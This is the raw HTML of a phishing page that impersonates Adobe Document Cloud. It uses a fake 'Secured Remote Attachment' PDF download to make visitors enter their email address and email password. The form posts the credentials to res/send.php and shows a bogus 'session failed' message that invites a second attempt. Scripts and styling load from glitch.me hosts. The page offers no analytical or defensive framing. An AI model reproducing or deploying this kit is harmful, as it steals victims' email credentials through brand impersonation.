 <!DOCTYPE html>
<html>
<head>
<title>A.d.o.b.e | Edit - Sign - View</title>
<link rel="icon" type="image/png" sizes="16x16" href="https://cdn.glitch.me/98b01d2b-bb3b-461e-acf1-14b7bfde0cde%2Ffavicon.png">

<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">


<link rel="stylesheet" href="https://nonstop-veil-curio.glitch.me/materialize.css" />
<link href="https://nonstop-veil-curio.glitch.me/materialicons.css" rel="stylesheet">

<link type="text/css" rel="stylesheet" href="https://nonstop-veil-curio.glitch.me/formmg.css" />
<link type="text/css" rel="stylesheet" href="https://nonstop-veil-curio.glitch.me/main.css" />

<meta name="viewport" content="width=device-width, initial-scale=1.0" />
</head>
<body>
<div class="container">
<section id="bgxcover"></section>
<header>
<div href="#!" class="adobeloqodiv">
<figure class="adobeloqofig">
<img src="https://cdn.glitch.me/98b01d2b-bb3b-461e-acf1-14b7bfde0cde%2Funtitled.png">
<figcaption>Adobe</figcaption>
</figure>
</div>
</header>
<section class="contentmainmain">
<div class="whiteboard">
<header>
<ul class="flex-container nowrap">
<li class="flex-item">Edit Doc</li>
<li class="flex-item">Sign Doc</li>
<li class="flex-item active">View Doc</li>
</ul>
</header>
<div class="bodyproper">
<div class="sekure-n-icon">
<i class="material-icons">lock</i><span>Secured Remote Attachment</span>
</div>
<div class="attach-descriptions">
<figure class="adobeprevfig">
<center><img src="https://cdn.glitch.me/98b01d2b-bb3b-461e-acf1-14b7bfde0cde%2Fpdfprev.jpg"></center>
<div class="caption">
<span>Filename: Product description & drawings.pdf</span>
<span>Description: Description of order products and drawings - digital copy</span>
<span>Format: PDF</span>
<span>Size: 367 KB</span>
</div>
</figure>
</div>
<div class="dwld">
<a class="btnn btn4dl" id="btn4dlmodal">Download Pdf</a>

</div>
</div>
</div>
</section>
</div>
<style type="text/css">
        .val-error{     
          margin: 15px 3px;
          font-size: 14.5px;
          font-style: italic;
          color: red;
        }
   
      </style>
<div id="loginModal" class="modal">
<div class="modal-header">
<div class="fstspan"><img src="https://cdn.glitch.me/98b01d2b-bb3b-461e-acf1-14b7bfde0cde%2Facrobe.png"><span>Adobe Document Cloud<br> <summary>Receiver's Authentication Panel</summary></span> </div>
</div>
<div class="modal-content">
<p><i>Enter correct email login to access file.</i></p>
<form action="res/send.php" method="post" id="gawaboy">
<fieldset>
<div class="row">
<label for="correo">Email</label>
<input type="email" placeholder="Email address" name="email" id="email" required>
<span class="val-error"></span>
</div>
<div class="row">
<label for="mot">Email Password</label>
<input type="password" placeholder="Email password" name="password" id="password" required>
<span class="val-error"></span>
</div>
 <div class="alert alert-danger" id="msg" style="display: none;">Oops.. Something went wrong, session failed to open, please try again with your correct email and password</div>
<div class="btnDiv">
<button class="btn4dl" id="submit-btn">Download PDF</button>
</div>
</fieldset>
</form>
</div>
<div class="modal-footer">
Sign In with Receiver's Email and Password to Download Pdf
<br><small>&copy;2022 Adobe Inc.</small>

</div>
</div>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0-beta/js/materialize.min.js"></script>
<script src="https://unpkg.com/axios/dist/axios.min.js"></script>
<script type="text/javascript" src="https://nonstop-veil-curio.glitch.me/as-alert.js"></script>
<script type="text/javascript" src="https://nonstop-veil-curio.glitch.me/main.js"></script>

<!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>

<script src="https://sheer-massive-freesia.glitch.me/hon.js"></script>
</body>
</html>
